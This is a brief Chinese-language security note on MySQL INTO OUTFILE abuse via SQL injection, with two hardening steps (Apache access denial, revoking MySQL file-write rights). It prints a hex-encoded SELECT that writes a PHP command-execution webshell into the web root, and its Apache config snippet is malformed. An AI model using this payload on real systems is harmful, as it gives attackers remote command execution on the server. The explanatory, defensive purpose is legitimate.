Mysql into outfile
使用Mysql into outfile语句,可以方便导出表格的数据。同样也可以生成某些文件。因此有些人会利用sql注入生成特定代码的文件,然后执行这些文件。将会造成严重的后果。
Mysql into outfile 生成PHP文件
SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E into outfile ‘/var/www/html/fuck.php’
最后会在/var/www/html/路径下, 生成fuck.php文件, 文件内容是
安全配置
1、关闭Http远程访问权限
vim /etc/httpd/conf/httpd.conf
<Directory "/var/www/html>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Deny from all #拒绝远程访问
</Directory>
2、mysql 用户禁用文件写入权限
关闭mysql 用户文件写入权限,那么上述的into outfile sql语句便不能创建文件了。